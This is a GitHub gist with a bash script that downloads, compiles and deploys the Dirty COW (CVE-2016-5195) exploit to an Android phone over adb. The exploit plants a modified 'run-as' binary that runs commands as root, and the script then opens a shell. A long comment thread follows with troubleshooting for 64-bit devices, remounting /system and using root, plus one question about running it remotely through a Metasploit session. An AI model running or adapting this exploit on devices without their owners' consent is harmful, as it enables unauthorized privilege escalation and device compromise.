#!/bin/bash | |
# Give the usual warning. | |
clear; | |
echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds..."; | |
sleep 10; | |
clear; | |
# Download and extract exploit files. | |
echo "[INFO] Downloading exploit files from GitHub..."; | |
workspacezip="dirtyc0w_workspace.zip"; | |
workspace="dirtyc0w_workspace"; | |
rm -f $workspacezip > /dev/null; # Remove zip if it exists | |
rm -rf $workspace > /dev/null; # Remove workspace if it exists | |
wget -O dirtyc0w_workspace.zip https://github.com/Arinerron/CVE-2016-5195/archive/master.zip > /dev/null 2>&1; | |
if [ -f $workspacezip ]; | |
then | |
echo "[INFO] Extracting exploit files..."; | |
unzip -a $workspacezip -d $workspace > /dev/null; | |
rm -f $workspacezip; # Remove zip if it exists | |
else | |
echo "[ERR] Failed to download exploit files."; | |
exit 1; | |
fi; | |
if [ -d $workspace ]; | |
then | |
cd $workspace; | |
directory=$PWD; # thx @tomdeboer! | |
cd CVE-2016-5195-master; | |
else | |
echo "[ERR] Failed to extract exploit files."; | |
exit 1; | |
fi; | |
# Compile and send exploit. | |
echo "[INFO] Exploiting dirtyc0w vulnerability..."; | |
sleep 1; # Let them read the message before chaos | |
make root; | |
clear; | |
# Hooray! | |
echo -n "[INFO] Complete. Installed package \"run-as\" on device.\n[INFO] Cleaning up workspace..."; | |
rm -rf $directory; # Clean up workspace | |
echo "Done"; | |
echo "[INFO] Starting shell in 3 seconds..."; | |
sleep 3; # Look, it worked! | |
adb shell; | |
clear; | |
exit 0; |
This comment has been minimized.
This comment has been minimized.
Hey, Cool seeing you on front page of HN! |
This comment has been minimized.
This comment has been minimized.
@beardog108 I am? :P |
This comment has been minimized.
This comment has been minimized.
This comment has been minimized.
This comment has been minimized.
Well if you can execute as root, I'm pretty sure that qualified as rooting in this case. |
This comment has been minimized.
This comment has been minimized.
It'd be nice to have a little check after the download and unzip to see if it worked, otherwise your $PWD will be recursively removed Edit: Done. |
This comment has been minimized.
This comment has been minimized.
@tomdeboer Haha, that's true. Revised the code. |
This comment has been minimized.
This comment has been minimized.
Why does it download and execute a script from the web (and not even verify a hash!) instead of bundling the necessary files? (At least it uses HTTPS...) |
This comment has been minimized.
This comment has been minimized.
@RenaKunisaki Right, I'll do that when I have time. Thanks. |
This comment has been minimized.
This comment has been minimized.
It does not work on my Stock Samsung Galaxy S5 (Android 6.0.1/Patchlevel September 1-2016/Kernel3.4.0-8538464).
|
This comment has been minimized.
This comment has been minimized.
@blizzard4591 Hey. You're not the only one with that problem actually. The reason why it doesn't work is (probably) because your phone has a 64-bit CPU. I haven't worked on a 64-bit version yet, but in the makefile, you can change a setting in the makefile so it compiles for 64-bit architecture. Edit: Here's an issue you might want to see: timwr/CVE-2016-5195#7 |
This comment has been minimized.
This comment has been minimized.
Is there something I'm doing wrong here? |
This comment has been minimized.
This comment has been minimized.
@MF064DD Is there an error when you run: wget -O dirtyc0w_workspace.zip https://github.com/Arinerron/CVE-2016-5195/archive/master.zip; ? Edit: Oh, nevermind. Apparently wget doesn't accept variables in the parameters. I updated the script. Sorry for the inconvenience! |
This comment has been minimized.
This comment has been minimized.
Still the same error: Failed to download exploit files |
This comment has been minimized.
This comment has been minimized.
Exactly what he said. :p Maybe I'm doing it wrong. I installed the necessary sdk modules and such. Here's a visual. |
This comment has been minimized.
This comment has been minimized.
when i try just to execute the wget command i get this error: |
This comment has been minimized.
This comment has been minimized.
@MF064DD @SpyKnife Okay, sorry guys. The problem is that wget and unzip commands aren't being used properly. I can't fix it on my phone, because the editor isn't working. I won't have computer access till tonight (it's noon here, and I'm at school). Really sorry about the delay! I'll @mention you when it is fixed. |
This comment has been minimized.
This comment has been minimized.
No problem man! Hey, you gotta life. I can wait as long as you need us to. ^^ |
This comment has been minimized.
This comment has been minimized.
@MF064DD @SpyKnife Okay, weird thing. I'm on my computer now, and I can execute the script fine. I think the reason why it works on my computer and not my laptop is because of the version of wget and/or unzip. Specifically, wget seems to not have SSL support on certain versions (probably yours too). I'm not sure as of now how I can download files off the internet via bash without using 3rd parties (like curl). Here's a manual guide though: Root Android 32-bit / GuidePrerequisites
Steps
And tada! The |
This comment has been minimized.
This comment has been minimized.
@blizzard4591 Here's a quote from the issue: The device has a 64-bit architecture, so we need to use the arm64-v8a variant of the compiled binaries. [This is how I modified the file]
A good way to get device's abi could be
|
This comment has been minimized.
This comment has been minimized.
Total noob here: is it usable on a Exynos S7Edge (G935F)? If so, would it trip knox to 0x1 (I assume it won't, but asking to be sure) |
This comment has been minimized.
This comment has been minimized.
Man, those semicolons are driving me crazy. :O This is just an automation script for CVE repo, right? |
This comment has been minimized.
This comment has been minimized.
Cool, got that... now where do I go from here exactly? http://imgur.com/a/0rHeI |
This comment has been minimized.
This comment has been minimized.
i got run-as on, my phone, but if i try to do anything with it i get permission denied. Has anyone been able to run things as root with this? My phone doesn't have a way to unlock the bootloader, could that have something to do with it? |
This comment has been minimized.
This comment has been minimized.
Is this only for 32-bit Android phones? |
This comment has been minimized.
This comment has been minimized.
Heh, here we go. @RaPoZaUm Probably would work, but I haven't tested it. |
This comment has been minimized.
This comment has been minimized.
Anyone has any idea what to use on the argument of run-as ?
edit: I found what goes on package-name, this will give you a list of options
but... it doesn't work, example:
|
This comment has been minimized.
This comment has been minimized.
@Arinerron my phone is 32 bit :/ |
This comment has been minimized.
This comment has been minimized.
It won't work anyway. The exploit in question can't run anything out of it's normal context, because SE for Android will catch it (darn you SELinux, ruining my dreams constantly since 1998), and the child/fork will run with standard UID. I tried to run |
This comment has been minimized.
This comment has been minimized.
Have you taken into account that |
This comment has been minimized.
This comment has been minimized.
Arinerron please do (automation script) to 64 bit. I tried to modify the way you showed it but I could not get ...I have a backup TA partition for my Sony XA Ultra make via dirtyc0w escalation exploit. Now I need to exploit to root but I did not get, please help me |
This comment has been minimized.
This comment has been minimized.
Hello, sorry if I'm not an expert, but when I execut "run-as" it shows: |
This comment has been minimized.
This comment has been minimized.
Will this work on Doogee X9 Pro or I will brick my device with this? Will this script install SuperSU or I must manually download it? |
This comment has been minimized.
This comment has been minimized.
@PVineeth @MrMino @tinxx @garikay @Pcmster @Buranek If you're tech-savvy (I assume you are since you are using GitHub), I made a more "hands on" tutorial here. :) @MF064DD Sorry for the late response. Type Good luck! If that doesn't work, feel free to @mention me and I'll see if I can help. |
This comment has been minimized.
This comment has been minimized.
I'm trying to use this to root a B&O Horizon running Android 5.1.1, and it doesn't seem to work. When I do
If I try to run any package with Any thoughts @Arinerron ? |
This comment has been minimized.
This comment has been minimized.
I tried using this on LG G3 (with armeabi-v7a version), but I get this error:
And
Anybody has any suggestions? |
This comment has been minimized.
This comment has been minimized.
@Arinerron Is there anyway to do this WITHOUT modifying files on the system partition? I mean, if you can use this exploit to replace |
This comment has been minimized.
This comment has been minimized.
nice |
This comment has been minimized.
This comment has been minimized.
@Arinerron setresgid/setresuid failed on my Note 5 arm64-v8a .. I don't really know where to begin to fix that but if I could get some elevation I could have some real fun. I am a programmer, just not an Android wizard. |
This comment has been minimized.
This comment has been minimized.
Hi @Arinerron, shell@P1a42:/ # echo "pwned" > root_only_file.txt Is there any extra steps to take it work? |
This comment has been minimized.
This comment has been minimized.
Hi, @thaomvs to need remount file system on write |
This comment has been minimized.
This comment has been minimized.
@thaomvs Sorry about the late reply-- Simply executing |
This comment has been minimized.
This comment has been minimized.
Once i gain root acces i can't remount system for installing su binnary, athene_f:/ $ run-as uid run-as 2000 athene_f:/ # whoami root athene_f:/ # mount -o rw,remount /system
Steps
make root && adb shell; and my phone is a 32bits Thanks |
This comment has been minimized.
This comment has been minimized.
@Arinerron i have read thru the comments and i have a question. |
This comment has been minimized.
This comment has been minimized.
@sevenup30 Try remounting |
This comment has been minimized.
This comment has been minimized.
@m4hmoud Sorry again for the late reply. Dirtycow was from last November-ish. Do you know if your system already patched? |
This comment has been minimized.
This comment has been minimized.
hi, I've done all the steps, but don't get any info instead of exploited.
|
This comment has been minimized.
This comment has been minimized.
@20esaua After run this command : mount -o rw,remount /dev/block/bootdevice/by-name/system /system |
This comment has been minimized.
This comment has been minimized.
Is there something we have to write in place of "by-name" |
This comment has been minimized.
This comment has been minimized.
So this Script installs a Custom Version of run-as? Do i lose my guarantee if i use this Script? |
This comment has been minimized.
This comment has been minimized.
@Arinerron Hello! I am very new to Github, It is my first comment. Just signed up and wanna ask you something, I came to know about this vulnerability but I was working on Metasploit and somehow find that video where it shows gaining root privilege remotely through metasploit just have to open USB DEBUGGING and run this root.sh on android mobile /sdcard dir. So my question is as I am facing the same error that the files fails to download from github when I run the script on metasploit session, But when I run it on the directory where SDK is installed it works but says no emulated or android devices connected obviously. I just downloaded SDK manually and extracted in Home directory but when ever I try to run the script it on metasploit session it fails to download from Github. Can you please simplify my issue for me? just straight forwardly wanna know is it possible to gain acces remotely without devices being connected through USB and have this root.sh running and getting root privilege ? If yes than how can I use those manual step you provided as I can't connect the device I wanna try it on Metasploit... |
This comment has been minimized.
I put 'root' in quotes, because technically, it isn't rooting. However, it creates a binary called 'run-as' that can execute packages as root.